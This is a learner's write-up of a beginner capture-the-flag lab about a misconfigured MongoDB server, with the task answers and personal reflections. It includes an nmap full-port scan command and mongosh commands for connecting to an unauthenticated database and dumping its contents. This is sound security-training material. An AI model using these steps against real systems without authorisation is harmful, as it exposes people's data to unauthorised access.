Lab Objective: Mongod is the seventh machine in the Starting Point Tier 0 series, available with VIP access. We explore MongoDB — a document-oriented NoSQL database organised into databases, collections, and documents. Documents store data in a JSON-like format containing strings, numbers, and dates. Misconfiguration leads to the vulnerability here, as it does across most of this tier.

Enumeration

With the walkthrough's guidance, the correct Nmap command here is: nmap -p- --min-rate 1000 -sV {targetIP}

The extra flags: -p- scans all 65,535 ports; --min-rate 1000 sets the minimum packets per second Nmap should send; -sV detects service versions.

Task 1 — How many TCP ports are open?
Answer: 2.

Task 2 — Which service is running on port 27017?
Answer: MongoDB 3.6.8.

Task 3 — What type of database is MongoDB?
Answer: NoSQL.

Establishing a Foothold

Task 4 — What command launches the interactive MongoDB shell?
Answer: mongosh. Connect directly to the target: mongosh {targetIP}.

Task 5 — What command lists all databases on the server?
Answer: show dbs.

Task 6 — What command lists collections in a database?
Answer: show collections.

Task 7 — What command dumps the content of all documents in a collection named flag?
Answer: db.flag.find().

Task 8 — Submit the Flag.
Answer: Follow the steps above to retrieve it.

Final Thoughts

• I did not enjoy the feeling of not knowing what I was doing, or the reliance on the guide walkthrough. But I took it as a learning opportunity.
• I will not always know everything, especially this early. What matters is how I engage with the unknown — not skipping it, but looking it up, reading around it, making notes.
• The final lesson: if a service is connected to the internet with default settings, no sophisticated hacking is required. Only the right client tool.

Enumeration tells me what services are running on a host. When I feel overwhelmed by an unfamiliar service, the right move is research — not frustration. I should document the process, including how I dealt with not knowing.